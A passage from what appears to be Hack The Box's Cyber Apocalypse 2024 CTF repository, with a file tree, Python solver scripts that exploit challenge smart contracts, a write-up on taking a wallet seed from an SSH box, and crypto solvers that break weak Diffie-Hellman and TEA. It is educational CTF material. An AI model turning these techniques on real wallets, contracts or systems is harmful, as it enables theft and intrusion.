├── README.md ├── assets ├── banner.png ├── htb.png └── logo_htb.png ├── blockchain ├── Lucky Faucet [Easy] │ ├── README.md │ └── htb │ │ └── solver.py ├── Recovery [Easy] │ ├── README.md │ └── assets │ │ ├── CA_banner.jpg │ │ ├── btc_sent.png │ │ ├── electrum_download.png │ │ ├── electrum_importseed.png │ │ ├── electrum_newwallet.png │ │ ├── electrum_server.png │ │ ├── flag.png │ │ ├── hacktheboo_banner.jpg │ │ ├── sending_btc_back.png │ │ ├── ssh_access.png │ │ └── stolen_bitcoin.png └── Russian Roulette [Very Easy] │ ├── README.md │ ├── assets │ └── CA_banner.jpg │ └── htb │ └── solver.py ├── crypto ├── [Easy] Blunt │ ├── README.md │ └── htb │ │ └── solve.sage ├── [Easy] Iced Tea │ ├── Makefile │ ├── README.md │ └── htb │ │ ├── output.txt │ │ └── solver.py ├── [Hard] Permuted │ ├── README.md │ └── htb │ │ ├── secret.py │ │ └── solve.py ├── [Hard] Tsayaki │ ├── Makefile │ ├── README.md │ └── htb │ │ ├── solver.py │ │ └── tea.py ├── [Insane] ROT128 │ ├── Makefile │ ├── README.md │ └── htb │ │ └── solver.sage ├── [Medium] Arranged │ ├── README.md │ └── htb │ │ └── solve.sage ├── [Medium] Partial Tenacity │ ├── Makefile │ ├── README.md │ └── htb │ │ ├── output.txt │ │ └── solver.py ├── [Very Easy] Dynastic │ ├── Makefile │ ├── README.md │ └── htb │ │ ├── output.txt │ │ └── solver.py ├── [Very Easy] Makeshift │ ├── README.md │ └── htb │ │ └── solve.py └── [Very Easy] Primary Knowledge │ ├── Makefile │ ├── README.md │ └── htb │ ├── output.txt │ └── solver.py ├── forensics ├── .gitkeep ├── [Easy] Fake Boost │ ├── Readme.md │ └── assets │ │ ├── banner.png │ │ ├── htb.png │ │ ├── writeup1.png │ │ ├── writeup2.png │ │ └── writeup3.png ├── [Easy] Persue The Tracks │ ├── README.md │ └── assets │ │ └── images │ │ ├── banner.png │ │ ├── htb.png │ │ ├── q1.png │ │ ├── q2.png │ │ ├── q3.png │ │ ├── q4.png │ │ ├── q5.png │ │ ├── q6.png │ │ ├── q7.png │ │ ├── q8.png │ │ └── q9.png ├── [Hard] Confinement │ ├── README.md │ └── assets │ │ ├── banner.png │ │ ├── chainsaw.png │ │ ├── cyberchef.png │ │ ├── decrypt-quarantine-file.png │ │ ├── decrypt.png │ │ ├── firstlook.png │ │ ├── flag.png │ │ ├── htb.png │ │ ├── intel-prefetch.png │ │ ├── intel-securitylog.png │ │ ├── log-quarantine.png │ │ ├── pwsh-command1.png │ │ ├── pwsh-command2.png │ │ ├── pwshlog.png │ │ ├── ransomnote.png │ │ ├── rev2.png │ │ ├── rev3.png │ │ └── rev4.png ├── [Hard] Game Invitation │ ├── README.md │ └── assets │ │ ├── banner.png │ │ ├── cyberchef.png │ │ ├── flag.png │ │ ├── htb.png │ │ ├── step_one.png │ │ ├── step_two.png │ │ └── step_two_beautified.png ├── [Insane] Oblique Final │ ├── Readme.md │ └── assets │ │ ├── banner.png │ │ ├── cor20.png │ │ ├── dnspy_debug_options.png │ │ ├── dotpeek.png │ │ ├── hexedit.png │ │ ├── htb.png │ │ ├── ilspy.png │ │ ├── r2r.png │ │ ├── shellcode_range.png │ │ └── tabs.png ├── [Medium] Data Siege │ ├── README.md │ └── assets │ │ └── images │ │ ├── banner.png │ │ └── htb.png ├── [Medium] Phreaky │ ├── Assets │ │ ├── Images │ │ │ ├── banner.png │ │ │ ├── example.png │ │ │ ├── htb.png │ │ │ └── shell.png │ │ ├── image-20240307210526796.png │ │ ├── image-20240307210539350.png │ │ ├── image-20240307210553102.png │ │ ├── image-20240307210648805.png │ │ ├── image-20240307210826562.png │ │ ├── image-20240307211242055.png │ │ ├── image-20240307211425321.png │ │ ├── image-20240307211518078.png │ │ ├── image-20240307211611787.png │ │ └── image-20240307211632474.png │ └── README.md ├── [Very Easy] An unusual sighting │ ├── README.md │ └── assets │ │ ├── banner.png │ │ └── htb.png ├── [Very Easy] It Has Begun │ ├── Readme.md │ └── assets │ │ ├── banner.png │ │ ├── htb.png │ │ └── image.png └── [Very Easy] Urgent │ ├── README.md │ └── assets │ ├── banner.png │ ├── conv.png │ ├── conv_full.png │ ├── cyberchef1.png │ ├── cyberchef2.png │ ├── flag.png │ ├── htb.png │ └── html.png ├── hw ├── BunnyPass [Very Easy] │ ├── README.md │ ├── assets │ │ ├── get_msg_1.png │ │ ├── get_msg_2.png │ │ ├── get_msg_3.png │ │ ├── loginpage.png │ │ ├── page_1.png │ │ ├── queues2.png │ │ └── rabbitmq.png │ └── entrypoint.sh ├── Flash-ing Logs [Hard] │ ├── README.md │ ├── assets │ │ ├── W25Q128.png │ │ ├── datahsheet_2.png │ │ ├── datasheet_1.png │ │ ├── datasheet_3_instructions.png │ │ ├── datasheet_3_instructions_2.png │ │ ├── flow_1.png │ │ ├── instruction_erase_sector.png │ │ ├── instruction_page_program.png │ │ ├── instruction_read.png │ │ ├── instruction_read_sec_reg.png │ │ ├── instruction_write_enable.png │ │ └── winbond.png │ └── htb │ │ └── solver.py ├── Maze [Very Easy] │ ├── Makefile │ ├── README.md │ └── assets │ │ └── image-20240314210808496.png ├── Rids [Easy] │ ├── README.md │ ├── assets │ │ ├── W25Q128.png │ │ ├── datahsheet_2.png │ │ ├── datasheet_1.png │ │ ├── instruction_read.png │ │ ├── read.png │ │ └── winbond.png │ └── htb │ │ └── solver.py └── The PROM [Medium] │ ├── README.md │ ├── assets │ ├── image-20240313172648964.png │ ├── image-20240313172820264.png │ ├── image-20240313172942389.png │ └── image-20240313173144008.png │ └── htb │ └── solver.py ├── misc ├── [Easy] Cubicle Riddle │ ├── README.md │ └── htb │ │ └── solver.py ├── [Easy] Unbreakable │ ├── README.md │ ├── assets │ │ ├── banner.png │ │ └── htb.png │ └── htb │ │ ├── main.py │ │ └── solver.py ├── [Easy] Were Pickle Phreaks │ ├── README.md │ └── htb │ │ └── sol.py ├── [Hard] MultiDigilingual │ ├── README.md │ └── htb │ │ └── sol.py ├── [Hard] Path of Survival │ ├── README.md │ ├── assets │ │ └── initial_view.png │ └── htb │ │ ├── consts_sol.py │ │ ├── game_sol.py │ │ ├── pathfinder_sol.py │ │ └── solve.py ├── [Medium] Colored Squares │ ├── Makefile │ ├── README.md │ └── htb │ │ └── solver.py ├── [Medium] Quantum Conundrum │ ├── README.md │ ├── assets │ │ └── image.png │ └── htb │ │ └── solver.py ├── [Medium] Were Pickle Phreaks Revenge │ ├── README.md │ └── htb │ │ └── sol.py ├── [Very Easy] Character │ ├── README.md │ └── htb │ │ └── solve.py └── [Very Easy] Stop Drop and Roll │ ├── README.md │ └── htb │ └── solve.py ├── pwn ├── [Easy] Pet companion │ ├── README.md │ ├── assets │ │ ├── banner.png │ │ └── htb.png │ └── htb │ │ └── solver.py ├── [Easy] Rocket Blaster XXX │ ├── README.md │ ├── assets │ │ ├── banner.png │ │ ├── htb.png │ │ └── inter.png │ └── htb │ │ └── solver.py ├── [Hard] Maze of Mist │ ├── README.md │ ├── assets │ │ └── symlink.png │ └── htb │ │ └── exploit.py ├── [Hard] Oracle │ ├── README.md │ └── htb │ │ └── exploit.py ├── [Insane] Gloater │ ├── README.md │ ├── assets │ │ └── initial_run.png │ └── htb │ │ └── exploit.py ├── [Medium] Death Note │ ├── README.md │ ├── assets │ │ ├── banner.png │ │ └── htb.png │ └── htb │ │ └── solver.py ├── [Medium] Sound of Silence │ ├── README.md │ ├── assets │ │ ├── banner.png │ │ └── htb.png │ └── htb │ │ └── solver.py ├── [Very Easy] Delulu │ ├── README.md │ ├── assets │ │ ├── banner.png │ │ ├── htb.png │ │ └── interface.png │ └── htb │ │ └── solver.py ├── [Very Easy] Tutorial │ ├── README.md │ ├── assets │ │ ├── banner.png │ │ ├── htb.png │ │ └── interface.png │ └── htb │ │ └── solver.py └── [Very Easy] Writing on the wall │ ├── README.md │ ├── assets │ ├── banner.png │ └── htb.png │ └── htb │ └── solver.py ├── reversing ├── [Easy] Crushing │ ├── README.md │ └── htb │ │ └── solve.py ├── [Hard] FlecksOfGold │ └── README.md ├── [Hard] Metagaming │ ├── README.md │ └── htb │ │ └── solve.py ├── [Insane] MazeOfPower │ ├── README.md │ ├── htb │ │ ├── go.mod │ │ ├── go.sum │ │ └── solve.go │ └── solve.py ├── [Medium] FollowThePath │ ├── README.md │ └── htb │ │ └── solve.py ├── [Medium] QuickScan │ ├── README.md │ └── htb │ │ └── solve.py ├── [Very Easy] BoxCutter │ └── README.md ├── [Very Easy] LootStash │ └── README.md └── [Very Easy] PackedAway │ ├── README.md │ └── assets │ ├── flag.png │ └── textbox.png └── web ├── [Easy] Labyrinth Linguist ├── README.md ├── assets │ └── overview.png ├── entrypoint.sh └── htb │ ├── flag.sh │ └── solver.py ├── [Easy] Testimonial ├── README.md ├── assets │ └── overview1.png ├── entrypoint.sh └── htb │ ├── solution.txt │ └── solver │ ├── .env │ ├── go.mod │ ├── go.sum │ ├── main.go │ ├── pb │ ├── ptypes.pb.go │ ├── ptypes.proto │ └── ptypes_grpc.pb.go │ └── pwn.go ├── [Hard] Percetron ├── .gitignore ├── README.md ├── assets │ ├── about.png │ ├── addcert.png │ ├── admin.png │ ├── certificates.png │ ├── home.png │ ├── hosts.png │ ├── login.png │ ├── management.png │ ├── op_msg.png │ ├── overview.png │ ├── register.png │ ├── smuggling.png │ ├── smuggling2.png │ └── solved.png ├── conf │ ├── haproxy.conf │ └── supervisord.conf ├── entrypoint.sh └── htb │ └── solver.py ├── [Insane] apexsurvive ├── assets │ ├── admhoem.png │ ├── afterverified.png │ ├── chrover.png │ ├── cook.png │ ├── csrfdone.png │ ├── cssexpl.png │ ├── email.png │ ├── flag.png │ ├── home.png │ ├── inbox.png │ ├── info.png │ ├── login.png │ ├── proadd.png │ └── product.png ├── bot │ └── app.py ├── email-app │ ├── index.js │ ├── package-lock.json │ ├── package.json │ ├── routes │ │ └── index.js │ ├── static │ │ ├── css │ │ │ └── bootstrap.min.css │ │ └── images │ │ │ └── LaughtPepe.gif │ └── views │ │ └── home.html ├── entrypoint.sh ├── htb │ ├── css_injection_csrf │ │ ├── css-exfiltrator-server.js │ │ ├── package-lock.json │ │ └── package.json │ ├── genPDF.py │ ├── payload.pdf │ ├── solver.py │ └── test.jpeg └── official_writeup.md ├── [Medium] LockTalk ├── README.md ├── assets │ └── .gitkeep ├── conf │ ├── haproxy.cfg │ ├── requirements.txt │ ├── supervisord.conf │ └── uwsgi.ini └── htb │ └── solver.py ├── [Medium] SerialFlow ├── README.md ├── assets │ ├── overview.png │ └── purple.png ├── conf │ └── supervisord.conf ├── entrypoint.sh └── htb │ └── solver.py ├── [Very Easy] Flag Command ├── assets │ ├── dev.png │ ├── flag.png │ ├── home.png │ └── res.png ├── htb │ └── solver.py └── official_writeup.md ├── [Very Easy] KORP Terminal ├── .gitignore ├── README.md ├── assets │ ├── dump.png │ ├── overview.png │ └── sqlmap.png ├── conf │ └── supervisord.conf ├── entrypoint.sh └── htb │ └── solver.py └── [Very Easy] TimeKORP ├── README.md ├── assets └── preview.png ├── flag └── htb └── solver.py /assets/banner.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/assets/banner.png -------------------------------------------------------------------------------- /assets/htb.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/assets/htb.png -------------------------------------------------------------------------------- /assets/logo_htb.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/assets/logo_htb.png -------------------------------------------------------------------------------- /blockchain/Lucky Faucet [Easy]/htb/solver.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | from os import system 3 | from pwn import remote, context, args 4 | 5 | context.log_level = "error" 6 | 7 | if args.REMOTE: 8 | ip = args.HOST 9 | rpc_port = args.RPC_PORT 10 | tcp_port = args.TCP_PORT 11 | RPC_URL = f"http://{ip}:{int(rpc_port)}/" 12 | TCP_URL = f"{ip}:{int(tcp_port)}" 13 | else: 14 | RPC_URL = "http://localhost:1337/" 15 | TCP_URL = "localhost:1338" 16 | 17 | if __name__ == "__main__": 18 | connection_info = {} 19 | 20 | # connect to challenge handler and get connection info 21 | with remote(TCP_URL.split(":")[0], int(TCP_URL.split(":")[1])) as p: 22 | p.sendlineafter(b"action? ", b"1") 23 | data = p.recvall() 24 | 25 | lines = data.decode().split('\n') 26 | for line in lines: 27 | if line: 28 | key, value = line.strip().split(' : ') 29 | connection_info[key] = value 30 | 31 | print(connection_info) 32 | pvk = connection_info['Private key '] 33 | target = connection_info['Target contract'] 34 | 35 | system( 36 | f"cast send --rpc-url {RPC_URL} --private-key {pvk} {target} 'setBounds(int64,int64)' -- -2 -1" 37 | ) 38 | system( 39 | f"cast send {target} 'sendRandomETH()' --rpc-url {RPC_URL} --private-key {pvk}" 40 | ) 41 | 42 | # get flag 43 | with remote(TCP_URL.split(":")[0], int(TCP_URL.split(":")[1])) as p: 44 | p.recvuntil(b"action? ") 45 | p.sendline(b"3") 46 | flag = p.recvall().decode() 47 | 48 | print(f"\n\n[*] {flag}") 49 | -------------------------------------------------------------------------------- /blockchain/Recovery [Easy]/README.md: -------------------------------------------------------------------------------- 1 | ![img](../../../../../assets/banner.png) 2 | 3 | Recovery 4 | 5 | 28th 2022 / Document No. D22.102.16 6 | 7 | Prepared By: perrythepwner 8 | 9 | Challenge Author(s): perrythepwner 10 | 11 | Difficulty: Easy 12 | 13 | Classification: Official 14 | 15 | # Synopsis 16 | 17 | - The challenge involves recovering stolen BTC funds given an Electrum seed phrase in a hacked SSH instance. 18 | 19 | # Description 20 | 21 | - We are The Profits. During a hacking battle our infrastructure was compromised as were the private keys to our Bitcoin wallet that we kept. 22 | We managed to track the hacker and were able to get some SSH credentials into one of his personal cloud instances, can you try to recover my Bitcoins? 23 | - Username: satoshi 24 | - Password: L4mb0Pr0j3ct 25 | - NOTE: Network is regtest, check connection info in the handler first. 26 | 27 | # Skills Required 28 | 29 | - Basic research skills. 30 | 31 | # Skills Learned 32 | 33 | - Bitcoin wallets. 34 | - Bitcoin regtest network. 35 | - Wallet seed phrases. 36 | - Electrum wallet setup & interaction. 37 | - Sending Bitcoins. 38 | 39 | # Enumeration 40 | 41 | We've been given access to an SSH instance with the credentials `satoshi:L4mb0Pr0j3ct`. Let's establish a connection and investigate the contents of the machine. 42 | 43 | ![SSH access](./assets/ssh_access.png) 44 | 45 | Once logged in, we'll notice a file named `electrum-wallet-seed.txt` in the home directory. Players can search for "electrum wallet seed" to find useful information: 46 | 47 | - [Electrum Seed Version System](https://electrum.readthedocs.io/en/latest/seedphrase.html) 48 | - [Restoring your standard wallet from seed - Bitcoin Electrum](https://bitcoinelectrum.com/restoring-your-standard-wallet-from-seed/) 49 | - [Creating an electrum wallet](https://bitcoinelectrum.com/creating-an-electrum-wallet/) 50 | 51 | These resources provide insights into Bitcoin wallets, how to create or load them, and details about BIP39. 52 | 53 | # Solution 54 | 55 | ## Wallet Recovery 56 | 57 | Now that we understand the concept of a seed and how Electrum wallets function, let's proceed with setting up the wallet client. 58 | 59 | 1. Install the Electrum wallet client. 60 | 61 | ![https://electrum.org/#download](./assets/electrum_download.png) 62 | 63 | 2. Begin the client in `regtest` mode as suggested in the description. 64 | ![new](./assets/electrum_newwallet.png) 65 | 66 | 2. Choose the standard wallet option, and then insert the seed found in the SSH instance. 67 | ![import](./assets/electrum_importseed.png) 68 | 69 | 3. Switch the network to the Electrum server provided in order to connect to the blockchain. 70 | ![server](./assets/electrum_server.png) 71 | 72 | Alternatively, you can start Electrum with the correct server from the command line using the following syntax: 73 | ```bash 74 | ./electrum-4.4.6-x86_64.AppImage --regtest --oneserver -s 0.0.0.0:50001:t 75 | ``` 76 | 77 | ## Sending back the bitcoin 78 | 79 | Now it's time to initiate the actual request to retrieve our funds. 80 | 81 | 1. Connect to the Challenge Handler to obtain the address. 82 | ![](./assets/challenge_handler.png) 83 | 84 | 2. Return the Bitcoin to the provided address. 85 | ![](./assets/sending_btc_back.png) 86 | ![](./assets/btc_sent.png) 87 | 88 | ## Getting the flag 89 | 90 | We can connect to the netcat instance one final time and select the "1) Get flag" option. 91 | 92 | ![](./assets/flag.png) 93 | -------------------------------------------------------------------------------- /blockchain/Recovery [Easy]/assets/CA_banner.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/blockchain/Recovery [Easy]/assets/CA_banner.jpg -------------------------------------------------------------------------------- /blockchain/Recovery [Easy]/assets/btc_sent.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/blockchain/Recovery [Easy]/assets/btc_sent.png -------------------------------------------------------------------------------- /blockchain/Recovery [Easy]/assets/electrum_download.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/blockchain/Recovery [Easy]/assets/electrum_download.png -------------------------------------------------------------------------------- /blockchain/Recovery [Easy]/assets/electrum_importseed.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/blockchain/Recovery [Easy]/assets/electrum_importseed.png -------------------------------------------------------------------------------- /blockchain/Recovery [Easy]/assets/electrum_newwallet.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/blockchain/Recovery [Easy]/assets/electrum_newwallet.png -------------------------------------------------------------------------------- /blockchain/Recovery [Easy]/assets/electrum_server.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/blockchain/Recovery [Easy]/assets/electrum_server.png -------------------------------------------------------------------------------- /blockchain/Recovery [Easy]/assets/flag.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/blockchain/Recovery [Easy]/assets/flag.png -------------------------------------------------------------------------------- /blockchain/Recovery [Easy]/assets/hacktheboo_banner.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/blockchain/Recovery [Easy]/assets/hacktheboo_banner.jpg -------------------------------------------------------------------------------- /blockchain/Recovery [Easy]/assets/sending_btc_back.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/blockchain/Recovery [Easy]/assets/sending_btc_back.png -------------------------------------------------------------------------------- /blockchain/Recovery [Easy]/assets/ssh_access.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/blockchain/Recovery [Easy]/assets/ssh_access.png -------------------------------------------------------------------------------- /blockchain/Recovery [Easy]/assets/stolen_bitcoin.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/blockchain/Recovery [Easy]/assets/stolen_bitcoin.png -------------------------------------------------------------------------------- /blockchain/Russian Roulette [Very Easy]/assets/CA_banner.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/blockchain/Russian Roulette [Very Easy]/assets/CA_banner.jpg -------------------------------------------------------------------------------- /blockchain/Russian Roulette [Very Easy]/htb/solver.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | from os import system 3 | from pwn import remote, context, args 4 | 5 | context.log_level = "error" 6 | 7 | if args.REMOTE: 8 | ip = args.HOST 9 | rpc_port = args.RPC_PORT 10 | tcp_port = args.TCP_PORT 11 | RPC_URL = f"http://{ip}:{int(rpc_port)}/" 12 | TCP_URL = f"{ip}:{int(tcp_port)}" 13 | else: 14 | RPC_URL = "http://localhost:1337/" 15 | TCP_URL = "localhost:1338" 16 | 17 | 18 | def csend(contract: str, fn: str, *args): 19 | print( 20 | f"cast send {contract} '{fn}' --rpc-url {RPC_URL} --private-key {pvk}") 21 | system( 22 | f"cast send {contract} '{fn}' --rpc-url {RPC_URL} --private-key {pvk}") 23 | 24 | 25 | if __name__ == "__main__": 26 | connection_info = {} 27 | 28 | # connect to challenge handler and get connection info 29 | with remote(TCP_URL.split(":")[0], int(TCP_URL.split(":")[1])) as p: 30 | p.sendlineafter(b"action? ", b"1") 31 | data = p.recvall() 32 | 33 | lines = data.decode().split('\n') 34 | for line in lines: 35 | if line: 36 | key, value = line.strip().split(' : ') 37 | connection_info[key] = value 38 | 39 | print(connection_info) 40 | pvk = connection_info['Private key '] 41 | setup = connection_info['Setup contract '] 42 | target = connection_info['Target contract'] 43 | 44 | while True: 45 | # try luck 46 | csend(target, "pullTrigger()") 47 | 48 | # get flag 49 | with remote(TCP_URL.split(":")[0], int(TCP_URL.split(":")[1])) as p: 50 | p.recvuntil(b"action? ") 51 | p.sendline(b"3") 52 | flag = p.recvall().decode() 53 | 54 | if "HTB" in flag: 55 | print(f"\n\n[*] {flag}") 56 | break 57 | -------------------------------------------------------------------------------- /crypto/[Easy] Blunt/README.md: -------------------------------------------------------------------------------- 1 | ![](../../../../../assets/banner.png) 2 | 3 | Blunt 4 | 5 | ​ 29th Jan 2024 / Document No. D24.102.27 6 | 7 | ​ Challenge Author(s): ir0nstone 8 | 9 | # Synopsis 10 | Blunt is an Easy crypto challenge that involves a small $p$ value, meaning it is easy to solve the DLP to retrieve the private exponents. 11 | 12 | ## Description: 13 | Valuing your life, you evade the other parties as much as you can, forsaking the piles of weaponry and the vantage points in favour of the depths of the jungle. As you jump through the trees and evade the traps lining the forest floor, a glint of metal catches your eye. Cautious, you creep around, careful not to trigger any sensors. Lying there is a knife - damaged and blunt, but a knife nonetheless. You’re not helpless any more. 14 | 15 | ## Skills Required 16 | - Basic understanding of the Diffie-Hellman Key Exchange 17 | 18 | ## Skills Learned 19 | - Solving the DLP in small groups 20 | - Using SageMath 21 | 22 | # Enumeration 23 | We are given the following script: 24 | ```py 25 | from Crypto.Cipher import AES 26 | from Crypto.Util.Padding import pad 27 | from Crypto.Util.number import getPrime, long_to_bytes 28 | from hashlib import sha256 29 | 30 | from secret import FLAG 31 | 32 | import random 33 | 34 | 35 | p = getPrime(32) 36 | print(f'p = 0x{p:x}') 37 | 38 | g = random.randint(1, p-1) 39 | print(f'g = 0x{g:x}') 40 | 41 | a = random.randint(1, p-1) 42 | b = random.randint(1, p-1) 43 | 44 | A, B = pow(g, a, p), pow(g, b, p) 45 | 46 | print(f'A = 0x{A:x}') 47 | print(f'B = 0x{B:x}') 48 | 49 | C = pow(A, b, p) 50 | assert C == pow(B, a, p) 51 | 52 | # now use it as shared secret 53 | hash = sha256() 54 | hash.update(long_to_bytes(C)) 55 | 56 | key = hash.digest()[:16] 57 | iv = b'\xc1V2\xe7\xed\xc7@8\xf9\\\xef\x80\xd7\x80L*' 58 | cipher = AES.new(key, AES.MODE_CBC, iv) 59 | 60 | encrypted = cipher.encrypt(pad(FLAG, 16)) 61 | print(f'ciphertext = {encrypted}') 62 | ``` 63 | 64 | This looks like a typical Diffie-Hellman Key Exchange: 65 | * A generator $g$ is defined in a finite field $F_p$ 66 | * The private exponents $a$ and $b$ are kept secret 67 | * $g$ is put to the power of $a$ and $b$ to form $A$ and $B$ respectively 68 | * The values are exchanged (printed out) and then both sides calculate put the values they receive to their private power to calculate $g^{ab}$ 69 | * This value is used as a shared secret for encryption 70 | 71 | The values are found in `output.txt`: 72 | ``` 73 | p = 0xdd6cc28d 74 | g = 0x83e21c05 75 | A = 0xcfabb6dd 76 | B = 0xc4a21ba9 77 | ciphertext = b'\x94\x99\x01\xd1\xad\x95\xe0\x13\xb3\xacZj{\x97|z\x1a(&\xe8\x01\xe4Y\x08\xc4\xbeN\xcd\xb2*\xe6{' 78 | ``` 79 | 80 | # Solution 81 | The weakness here is the generation of the public prime number $p$: 82 | ```python 83 | p = getPrime(32) 84 | ``` 85 | We can see that $p$ is a 32-bit number - far too small to provide any security! We can calculate 86 | the private exponent $a$ by calculating the **discrete logarithm** of $A$, which is easy since $p$ 87 | is so small. We're going to use SageMath's `discrete_log` functionality to do this. 88 | 89 | ```python 90 | p = 0xdd6cc28d 91 | F = GF(p) 92 | 93 | g = F(0x83e21c05) 94 | A = F(0xcfabb6dd) 95 | B = F(0xc4a21ba9) 96 | ciphertext = b'\x94\x99\x01\xd1\xad\x95\xe0\x13\xb3\xacZj{\x97|z\x1a(&\xe8\x01\xe4Y\x08\xc4\xbeN\xcd\xb2*\xe6{' 97 | 98 | # get a, and from there C 99 | a = discrete_log(A, g) 100 | C = B^a 101 | ``` 102 | 103 | Once we're retrieved the shared secret $C$, the decryption is simple - it's basic AES decryption. 104 | 105 | ```python 106 | # decrypt 107 | hash = sha256() 108 | hash.update(long_to_bytes(int(C))) 109 | 110 | key = hash.digest()[:16] 111 | iv = b'\xc1V2\xe7\xed\xc7@8\xf9\\\xef\x80\xd7\x80L*' 112 | cipher = AES.new(key, AES.MODE_CBC, iv) 113 | 114 | decrypted = cipher.decrypt(ciphertext) 115 | flag = unpad(decrypted, 16) 116 | print(flag) 117 | ``` 118 | 119 | And we get the flag! 120 | -------------------------------------------------------------------------------- /crypto/[Easy] Blunt/htb/solve.sage: -------------------------------------------------------------------------------- 1 | from Crypto.Cipher import AES 2 | from Crypto.Util.number import long_to_bytes 3 | from Crypto.Util.Padding import unpad 4 | from hashlib import sha256 5 | 6 | p = 0xdd6cc28d 7 | F = GF(p) 8 | 9 | g = F(0x83e21c05) 10 | A = F(0xcfabb6dd) 11 | B = F(0xc4a21ba9) 12 | ciphertext = b'\x94\x99\x01\xd1\xad\x95\xe0\x13\xb3\xacZj{\x97|z\x1a(&\xe8\x01\xe4Y\x08\xc4\xbeN\xcd\xb2*\xe6{' 13 | 14 | # get a, and from there C 15 | a = discrete_log(A, g) 16 | C = B^a 17 | 18 | # decrypt 19 | hash = sha256() 20 | hash.update(long_to_bytes(int(C))) 21 | 22 | key = hash.digest()[:16] 23 | iv = b'\xc1V2\xe7\xed\xc7@8\xf9\\\xef\x80\xd7\x80L*' 24 | cipher = AES.new(key, AES.MODE_CBC, iv) 25 | 26 | decrypted = cipher.decrypt(ciphertext) 27 | flag = unpad(decrypted, 16) 28 | print(flag) -------------------------------------------------------------------------------- /crypto/[Easy] Iced Tea/Makefile: -------------------------------------------------------------------------------- 1 | default: 2 | ifdef name 3 | @cd challenge; \ 4 | python3 source.py; \ 5 | mkdir crypto_$(name); \ 6 | cp source.py output.txt ./crypto_$(name); \ 7 | cp output.txt ../htb/; \ 8 | mv ./crypto_$(name) ../release/; 9 | 10 | @cd release; \ 11 | zip -9 -r ./crypto_$(name).zip ./crypto_$(name); \ 12 | unzip -l ./crypto_$(name).zip; 13 | 14 | @echo [+] Challenge was built successfully. 15 | else 16 | @echo [-] Please define the challenge name. For example, \"make name=cool_chall_name\" 17 | endif 18 | 19 | flag: 20 | @echo [+] Flag : $$(cd challenge; python3 -c 'import secret; print(secret.FLAG.decode())') 21 | solver: 22 | @echo [+] PoC : $$(cd htb ; python3 solver.py) 23 | 24 | test: clean default flag solver 25 | 26 | clean: 27 | @rm -rf release/* 28 | @rm -rf htb/output.txt 29 | @echo [+] Challenge release deleted successfully. 30 | -------------------------------------------------------------------------------- /crypto/[Easy] Iced Tea/htb/output.txt: -------------------------------------------------------------------------------- 1 | Key : 850c1413787c389e0b34437a6828a1b2 2 | Ciphertext : b36c62d96d9daaa90634242e1e6c76556d020de35f7a3b248ed71351cc3f3da97d4d8fd0ebc5c06a655eb57f2b250dcb2b39c8b2000297f635ce4a44110ec66596c50624d6ab582b2fd92228a21ad9eece4729e589aba644393f57736a0b870308ff00d778214f238056b8cf5721a843 -------------------------------------------------------------------------------- /crypto/[Easy] Iced Tea/htb/solver.py: -------------------------------------------------------------------------------- 1 | from Crypto.Util.number import bytes_to_long as b2l, long_to_bytes as l2b 2 | from Crypto.Util.Padding import unpad 3 | 4 | DELTA = 0x9e3779b9 5 | 6 | def decrypt_block(key, ct): 7 | m0 = b2l(ct[:4]) 8 | m1 = b2l(ct[4:]) 9 | msk = (1 << 32) - 1 10 | 11 | s = 0xc6ef3720 12 | 13 | for i in range(32): 14 | m1 -= ((m0 << 4) + key[2]) ^ (m0 + s) ^ ((m0 >> 5) + key[3]) 15 | m1 &= msk 16 | m0 -= ((m1 << 4) + key[0]) ^ (m1 + s) ^ ((m1 >> 5) + key[1]) 17 | m0 &= msk 18 | s -= DELTA 19 | 20 | m = ((m0 << 32) + m1) & ((1 << 64) - 1) 21 | 22 | return l2b(m) 23 | 24 | def load_data(): 25 | with open('output.txt') as f: 26 | key = bytes.fromhex(f.readline().split(' : ')[1]) 27 | enc_flag = bytes.fromhex(f.readline().split(' : ')[1]) 28 | return key, enc_flag 29 | 30 | def tea_ecb_decrypt(key, enc_flag): 31 | key = [b2l(key[i:i+4]) for i in range(0, len(key), 4)] 32 | blocks = [enc_flag[i:i+8] for i 